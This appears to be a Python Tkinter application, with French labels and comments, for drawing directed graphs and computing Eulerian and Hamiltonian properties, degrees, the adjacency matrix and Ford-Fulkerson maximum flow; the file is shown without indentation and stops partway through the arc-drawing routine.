text string | size int64 | token_count int64 |
|---|---|---|
##################################################
# Importation des Bibliotheques et fonctions:
from tkinter import *
from PIL import ImageGrab
from tkinter import PhotoImage
import tkinter as tk
from tkinter import ttk
from collections import defaultdict
class Euler:
def __init__(self,vertices):
self.V= vertices #No. of vertices
self.graph = defaultdict(list) # default dictionary to store graph
# function to add an edge to graph
def addEdge(self,u,v):
# alternatives
self.graph[u].append(v)
self.graph[v].append(u)
#A function used by isConnected
def DFSUtil(self,v,visited):
# Mark the current node as visited
visited[v]= True
#Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i]==False:
self.DFSUtil(i,visited)
'''Method to check if all non-zero degree vertices are
connected. It mainly does DFS traversal starting from
node with non-zero degree'''
def isConnected(self):
# Mark all the vertices as not visited
visited =[False]*(self.V)
# Find a vertex with non-zero degree
for i in range(self.V):
if len(self.graph[i]) > 1:
break
# If there are no edges in the graph, return true
if i == self.V-1:
return True
# Start DFS traversal from a vertex with non-zero degree
self.DFSUtil(i,visited)
# Check if all non-zero degree vertices are visited
for i in range(self.V):
if visited[i]==False and len(self.graph[i]) > 0:
return False
return True
'''The function returns one of the following values
0 --> If grpah is not Eulerian
1 --> If graph has an Euler path (Semi-Eulerian)
2 --> If graph has an Euler Circuit (Eulerian) '''
def isEulerian(self):
# Check if all non-zero degree vertices are connected
if self.isConnected() == False:
return 0
else:
#Count vertices with odd degree
odd = 0
for i in range(self.V):
if len(self.graph[i]) % 2 !=0:
odd +=1
'''If odd count is 2, then semi-eulerian.
If odd count is 0, then eulerian
If count is more than 2, then graph is not Eulerian
Note that odd count can never be 1 for undirected graph'''
if odd == 0:
return 2
elif odd == 2:
return 1
elif odd > 2:
return 0
# Function to run test cases
def test(self):
res = self.isEulerian()
if res == 0:
#print ("Le graphe n'est pas eulerien")
resultat="Le graphe n'est pas eulerien"
return resultat
elif res ==1 :
#print ("Le graphe comporte un chemain eulerien")
resultat="Le graphe comporte un chemain eulerien"
return resultat
else:
#print ("Le graphe comporte un cycle eulerien")
resultat="Le graphe comporte un cycle eulerien"
return resultat
class Hamilton():
def __init__(self, vertices):
self.graph = [[0 for column in range(vertices)]
for row in range(vertices)]
self.V = vertices
''' Check if this vertex is an adjacent vertex
of the previously added vertex and is not
included in the path earlier '''
def isSafe(self, v, pos, path):
# Check if current vertex and last vertex
# in path are adjacent
if self.graph[ path[pos-1] ][v] == 0:
return False
# Check if current vertex not already in path
for vertex in path:
if vertex == v:
return False
return True
#############################################################
# A recursive utility function to solve
# hamiltonian cycle problem
def hamCycleUtil(self, path, pos):
# base case: if all vertices are
# included in the path
if pos == self.V:
# Last vertex must be adjacent to the
# first vertex in path to make a cyle
if self.graph[ path[pos-1] ][ path[0] ] == 1:
return True
else:
return False
# Try different vertices as a next candidate
# in Hamiltonian Cycle. We don't try for 0 as
# we included 0 as starting point in in hamCycle()
for v in range(1,self.V):
if self.isSafe(v, pos, path) == True:
path[pos] = v
if self.hamCycleUtil(path, pos+1) == True:
return True
# Remove current vertex if it doesn't
# lead to a solution
path[pos] = -1
return False
def hamCycle(self):
path = [-1] * self.V
''' Let us put vertex 0 as the first vertex
in the path. If there is a Hamiltonian Cycle,
then the path can be started from any point
of the cycle as the graph is undirected '''
path[0] = 0
if self.hamCycleUtil(path,1) == False:
#print ("Solution does not exist\n")
resultat="Le graphe n'est pas hamiltonien"
return resultat
return self.printSolution(path)
def printSolution(self, path):
#print ("Solution Exists: Following is one Hamiltonian Cycle")
resultat="Le graphe est hamiltonien: "
for vertex in path:
#print (vertex)
resultat+=str(vertex)+" "
#print (path[0], "\n")
resultat+=str(path[0])
return resultat
##########################################
class Max_flow:
def __init__(self,graph):
self.graph = graph # residual graph
self. ROW = len(graph)
#self.COL = len(gr[0])
'''Returns true if there is a path from source 's' to sink 't' in
residual graph. Also fills parent[] to store the path '''
def BFS(self,s, t, parent):
# Mark all the vertices as not visited
visited =[False]*(self.ROW)
# Create a queue for BFS
queue=[]
# Mark the source node as visited and enqueue it
queue.append(s)
visited[s] = True
# Standard BFS Loop
while queue:
#Dequeue a vertex from queue and print it
u = queue.pop(0)
# Get all adjacent vertices of the dequeued vertex u
# If a adjacent has not been visited, then mark it
# visited and enqueue it
for ind, val in enumerate(self.graph[u]):
if visited[ind] == False and val > 0 :
queue.append(ind)
visited[ind] = True
parent[ind] = u
# If we reached sink in BFS starting from source, then return
# true, else false
return True if visited[t] else False
# Returns tne maximum flow from s to t in the given graph
def FordFulkerson(self, source, sink):
# This array is filled by BFS and to store path
parent = [-1]*(self.ROW)
max_flow = 0 # There is no flow initially
# Augment the flow while there is path from source to sink
while self.BFS(source, sink, parent) :
# Find minimum residual capacity of the edges along the
# path filled by BFS. Or we can say find the maximum flow
# through the path found.
path_flow = float("Inf")
s = sink
while(s != source):
path_flow = min (path_flow, self.graph[parent[s]][s])
s = parent[s]
# Add path flow to overall flow
max_flow += path_flow
# update residual capacities of the edges and reverse edges
# along the path
v = sink
while(v != source):
u = parent[v]
self.graph[u][v] -= path_flow
self.graph[v][u] += path_flow
v = parent[v]
return max_flow
#################################################################
# - Fenetre Graphe Orienter - #
# /////////////////////////////////////////////// #
# Description: Programme traitant sur les graphes #
# Orienter #
# /////////////////////////////////////////////// #
class GrapheOriente(Tk):
def __init__(self):
Tk.__init__(self) # constructeur de la classe parente
#recupere la taille de l'ecrant de l'ordinateur
width=self.winfo_screenwidth()
height=self.winfo_screenheight()
self.largeure=900
self.hauteure=500
self.x=(width/2)-(self.largeure/2)
self.y=(height/2)-(self.hauteure/2)
#initialisation du canvas
self.graphe =Canvas(self, width =self.largeure, height =self.hauteure, bg ="white")
self.geometry('{}x{}+{}+{}'.format(self.largeure,self.hauteure,int(self.x),int(self.y)))
self.resizable(False,False)
self.wm_title('Graphe Oriente')
self.graphe.pack(side =TOP, padx =5, pady =5)
#evenement declancher par les clic de la sourie
self.bind("<Double-Button-1>", self.sommet)
self.bind("<Button-3>", self.arc)
#menu de la fenetre
menubar = Menu(self)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_separator()
filemenu.add_command(label = "Quitter ?", command = self.destroy)
filemenu.add_command(label = "Sauvegarder", command = self.save)
menubar.add_cascade(label = "Fichier", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_separator()
filemenu.add_command(label = "Ordre du graphe", command=self.ordre_graphe)
filemenu.add_command(label = "Degre du sommet", command=self.degres_sommet)
filemenu.add_command(label = "Matrice d'adjacence", command=self.matriceAdj)
filemenu.add_command(label = "Successeur du sommet", command=self.successeur)
filemenu.add_command(label = "Predecesseur du sommet", command=self.predeccesseur)
filemenu.add_command(label = "Demi degre supperieur du sommet", command=self.demi_deg_sup)
filemenu.add_command(label = "Demi degre inferieur du sommet", command=self.demi_deg_inf)
filemenu.add_command(label = "Graphe Hamiltonien ?", command=self.hamilton)
filemenu.add_command(label = "Graphe Eulerien ?", command=self.euler)
filemenu.add_command(label = "Flow maximal", command=self.maxflow)
menubar.add_cascade(label = "Traitement", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_separator()
filemenu.add_command(label = "Tout effacer ?", command =self.delete)
menubar.add_cascade(label = "Effacer", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_command(label = "Aide", command =self.aide)
menubar.add_cascade(label = "Aide", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
self.config(menu = menubar)
#variable globale
self.i=int(0)
self.compt=int()
self.temp=list()
self.connect=list()
self.point=list()
self.sommets=list()
self.couple=list()
self.matrice=list()
self.var=StringVar()
self.entier=int()
def delete(self):
for element in self.graphe.find_all():
self.graphe.delete(element)
self.i=int(0)
self.compt=int()
self.temp=list()
self.connect=list()
self.point=list()
self.sommets=list()
self.couple=list()
self.matrice=list()
self.var=StringVar()
self.entier=int()
pass
# fonction permettant de fermer la fenetre fille
def Close_Toplevel (self):
self.compt=int()
self.temp=list()
self.wm_attributes("-disable",False)
self.toplevel_dialog.destroy()
self.deiconify()
#fenetre permettant de fermet la fenetre fille de sauvegarde
def Close_Save (self,event=None):
if len(self.var.get())>0:
x=self.graphe.winfo_rootx()
y=self.graphe.winfo_rooty()
w=self.graphe.winfo_width()
h=self.graphe.winfo_height()
image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2))
image.save("save/{}.png".format(self.var.get()))
else:
x=self.graphe.winfo_rootx()
y=self.graphe.winfo_rooty()
w=self.graphe.winfo_width()
h=self.graphe.winfo_height()
image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2))
image.save("save/Graphe.png")
self.wm_attributes("-disable",False)
self.toplevel_dialog.destroy()
self.deiconify()
def aide(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,150)
self.toplevel_dialog.wm_title("Aide")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=150
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
self.toplevel_dialog.focus()
aide="""
Tracer un sommet: Double clic
Tracer un arc: clic gauche sur chaque sommet
"""
self.label=tk.Label(self.toplevel_dialog, text=aide,justify='left',font='Century 13 bold')
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fonction de sauvegarde du graphe dessiner
def save(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Sauvegarder")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Save)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ')
self.label.pack(side='left')
self.var=tk.Entry(self.toplevel_dialog)
self.var.pack(side='left')
self.var.bind("<Return>", self.Close_Save)
self.var.bind("<Escape>", self.Close_Toplevel)
self.var.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_Save)
self.yes_button.pack(side='right',fill='x',expand=True)
# fonction permettant de detecter si le graphe est eulerien
def euler(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Graphe eulerien")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
l=len(self.couple)
lg=len(self.sommets)
if lg>=2:
g1 = Euler(lg)
for i in range(l):
g1.addEdge(self.couple[i][0],self.couple[i][1])
self.var=g1.test()
self.label=tk.Label(self.toplevel_dialog, text=self.var)
self.label.pack(side='top')
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fonction permettant de detecter si le graphe est hamiltonien
def hamilton(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Graphe hamiltonien")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
lg=len(self.couple)
if lg>1:
l=len(self.sommets)
self.matrice=list()
for i in range(l):
self.matrice.append([])
for j in range(l):
k=int(0)
temp=list()
temp.append(self.sommets[i])
temp.append(self.sommets[j])
for element in self.couple:
if temp[0]==element[0] and temp[1]==element[1]:
self.matrice[i].append(1)
k+=1
if k==0:
self.matrice[i].append(0)
g1 = Hamilton(l)
g1.graph = self.matrice
self.var=g1.hamCycle()
self.label=tk.Label(self.toplevel_dialog, text=self.var)
self.label.pack(side='top')
pass
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fonction permettant de connetre le flow maximal
def maxflow(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,200)
self.toplevel_dialog.wm_title("Flow maximal")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=200
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet source: ')
self.label.grid(row=1)
self.valeur1=tk.Entry(self.toplevel_dialog)
self.valeur1.grid(row=1,column=1)
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ')
self.label.grid(row=2)
self.valeur2=tk.Entry(self.toplevel_dialog)
self.valeur2.grid(row=2,column=1)
self.label=tk.Label(self.toplevel_dialog, text='\n\n')
self.label.grid(row=3)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_maxflow)
self.yes_button.grid(row=4,column=1)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=4,column=3)
pass
def Close_maxflow (self):
lg=len(self.couple)
if self.valeur1.get() in str(self.sommets) and self.valeur2.get() in str(self.sommets) and lg>0 and self.valeur1.get()!=self.valeur2.get() :
l=len(self.sommets)
self.matrice=list()
for i in range(l):
self.matrice.append([])
for j in range(l):
k=int(0)
temp=list()
temp.append(self.sommets[i])
temp.append(self.sommets[j])
for element in self.couple:
if temp[0]==element[0] and temp[1]==element[1]:
self.matrice[i].append(element[2])
k+=1
if k==0:
self.matrice[i].append(0)
g = Max_flow(self.matrice)
src=int(self.valeur1.get())
des=int(self.valeur2.get())
self.label=tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(src, des))
self.label.grid(row=6)
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.grid(row=6)
pass
def matriceAdj(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(300,300)
self.toplevel_dialog.wm_title("Matrice D'adjacence")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=300
hauteure=300
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
lg=len(self.couple)
if lg>0:
l=len(self.sommets)
self.matrice=list()
for i in range(l):
resultat=""
self.matrice.append([])
for j in range(l):
k=int(0)
temp=list()
temp.append(self.sommets[i])
temp.append(self.sommets[j])
for element in self.couple:
if temp[0]==element[0] and temp[1]==element[1]:
self.matrice[i].append(1)
resultat+="1 "
k+=1
if k==0:
self.matrice[i].append(0)
resultat+="0 "
self.label=tk.Label(self.toplevel_dialog, text=resultat)
self.label.pack(side='top')
pass
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fonction permettant de donner le successeur d'un sommet
def successeur(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(650,100)
self.toplevel_dialog.wm_title("Successeur d'un sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=650
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.focus()
self.toplevel_dialog.bind("<Return>", self.Close_suc)
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_suc)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=6)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_suc)
self.yes_button.grid(row=1,column=4)
pass
def Close_suc(self):
if self.valeur.get() in str(self.sommets):
resultat=""
for element in self.couple:
if self.valeur.get() == str(element[0]):
resultat+=str(element[1])+" "
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(),resultat))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def predeccesseur(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(650,100)
self.toplevel_dialog.wm_title("Predecesseur d'un sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=650
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_pred)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_pred)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=6)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_pred)
self.yes_button.grid(row=1,column=4)
def Close_pred(self):
if self.valeur.get() in str(self.sommets):
resultat=""
for element in self.couple:
if self.valeur.get() == str(element[1]):
resultat+=str(element[0])+" "
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(),resultat))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def demi_deg_sup(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(700,100)
self.toplevel_dialog.wm_title("Demi degre supperieur d'un sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=700
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_degre_sup)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_degre_sup)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=6)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_sup)
self.yes_button.grid(row=1,column=4)
def Close_degre_sup(self):
if self.valeur.get() in str(self.sommets):
k=int(0)
for element in self.couple:
if self.valeur.get() == str(element[0]):
k+=1
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre supperieur du sommet {} est: {}'.format(self.valeur.get(),k))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def demi_deg_inf(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(700,100)
self.toplevel_dialog.wm_title("Demi degre inferieur d'un sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=700
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_degre_inf)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_degre_inf)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=6)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_inf)
self.yes_button.grid(row=1,column=4)
def Close_degre_inf(self):
if self.valeur.get() in str(self.sommets):
k=int(0)
for element in self.couple:
if self.valeur.get() == str(element[1]):
k+=1
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre inferieur du sommet {} est: {}'.format(self.valeur.get(),k))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def degres_sommet(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Degre du sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_degre)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_degre)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=5)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre)
self.yes_button.grid(row=1,column=3)
def Close_degre(self):
if self.valeur.get() in str(self.sommets):
k=int(0)
for element in self.couple:
if self.valeur.get() in str(element):
k+=1
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le degre du sommet {} est: {}'.format(self.valeur.get(),k))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def ordre_graphe(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(502,50)
self.toplevel_dialog.wm_title("Ordre du graphe")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=502
hauteure=50
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
n=len(self.sommets)
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n))
self.toplevel_dialog_label.pack(side='top')
self.toplevel_dialog_yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.toplevel_dialog_yes_button.pack(side='right',fill='x',expand=True)
for i in range(3):
self.toplevel_dialog_label3=tk.Label(self.toplevel_dialog, text='\n')
self.toplevel_dialog_label3.pack()
pass
def sommet(self, event):
x,y=event.x,event.y
if self.point==[]:
self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan")
self.numero=self.graphe.create_text(x,y,text="{}".format(self.i))
self.point.append([event.x,event.y,self.sommet,self.numero,self.i])
self.sommets.append(self.i)
self.i+=1
else:
controle=0
for element in self.point:
if element[0]-25 < event.x < element[0]+25 and element[1]-25 < event.y < element[1]+25:
controle=1
if controle==0:
self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan")
self.numero=self.graphe.create_text(x,y,text="{}".format(self.i))
self.point.append([event.x,event.y,self.sommet,self.numero,self.i])
self.sommets.append(self.i)
self.i+=1
#procedure permettant de dessiner un arc entre deux sommets
def arc(self, event):
for element in self.point:
if element[0]-10 < event.x < element[0]+10 and element[1]-10 < event.y < element[1]+10:
self.temp.append(element)
self.compt+=1
if self.compt==2:
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(502,100)
self.toplevel_dialog.wm_title("Arc")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=502
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_arc)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4],self.temp[1][4]))
self.label.pack(side='top')
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.pack(side='top')
self.valeur.bind("<Return>", self.Close_arc)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_arc)
self.yes_button.pack(side='right',fill='x',expand=True)
def Close_arc (self,event=None):
if self.temp[0][0] < self.temp[1][0]:
a=[self.temp[0][0]+10,self.temp[0][1]]
b=[self.temp[1][0]-10,self.temp[1][1]]
self.graphe.create_line(a,b,arrow="last")
try:
self.entier=int(self.valeur.get())
except ValueError:
pass
if self.entier>0 or self.entier<0 :
pass
else:
self.entier=int(1)
self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
elif self.temp[0][0]==self.temp[1][0]:
self.graphe.delete(self.temp[0][2])
self.graphe.delete(self.temp[0][3])
self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-25,self.temp[0][0]+1,self.temp[0][1])
